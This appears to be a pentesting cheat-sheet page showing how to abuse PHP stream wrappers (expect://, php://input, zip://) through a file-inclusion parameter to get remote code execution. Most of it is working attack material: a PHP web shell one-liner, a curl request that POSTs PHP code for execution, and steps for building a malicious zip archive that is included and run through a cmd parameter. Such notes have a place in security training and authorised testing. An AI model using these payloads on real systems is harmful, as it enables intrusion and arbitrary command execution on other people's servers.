PHP Wrappers
http://osbornepro.com/index.php?language=expect://id
echo '<?php system($_GET['cmd']); ?>' | base64
# Place above result into URI below
curl -s -X POST --data "<?php system('id'); ?>" "http://osbornepro.com/index.php?language=php://input" | grep uid
sudo apt install phpX.Y-zip # Install tool
echo '<?php system($_GET['cmd']); ?>' > exec.php # Create payload
zip malicious.zip exec.php # Create the zip file
rm exec.php # Clean up now unneeded file
Next, copy malicious.zip to the webroot directory to simulate the upload. The files in the zip archive can be referenced using the # symbol, which should be URL-encoded in the request. For example, the URL
http://osbornepro.com/index.php?language=zip://malicious.zip%23exec.php&cmd=id
can be used to include exec.php and then execute code using the cmd parameter.
If accepted the cookies on this site are used for my own interest in who is viewing the site. I will not profit off of this information in any way.